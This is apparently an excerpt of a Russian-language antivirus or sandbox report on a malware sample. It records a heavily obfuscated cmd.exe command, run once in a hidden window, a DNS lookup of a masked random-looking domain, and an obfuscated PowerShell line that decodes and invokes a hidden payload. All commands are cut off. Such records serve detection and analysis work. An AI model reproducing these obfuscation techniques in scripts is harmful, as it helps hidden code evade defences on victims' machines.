Техническая информация
- '<SYSTEM32>\cmd.exe' YhthqZNjw zMhGNZnzLiJFdBrNEWzRdaD KYZioQawuo & %C^om^S^pEc% %C^om^S^pEc% /V /c set %KdHzUFWwINakKYq%=RVkBsBBQMJ&&set %JjpwFhmPBPNR%=p&&set %GXHpTbZVIEkw%=...
- DNS ASK kr#######asndasidhnjqwewq.com
- '<SYSTEM32>\cmd.exe' YhthqZNjw zMhGNZnzLiJFdBrNEWzRdaD KYZioQawuo & %C^om^S^pEc% %C^om^S^pEc% /V /c set %KdHzUFWwINakKYq%=RVkBsBBQMJ&&set %JjpwFhmPBPNR%=p&&set %GXHpTbZVIEkw%=...' (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' ". ((VariaBle '*mdr*').NamE[3,11,2]-JOiN'')(( [runTime.INTerOPserviCes.MaRshal]::([runtIme.iNtErOPSErVicES.MARsHAL].GeTMeMbers()[3].NaME).INvoKE([runTIME.InteropsERVICES.MarsHal]::sEcuReSTrINGt...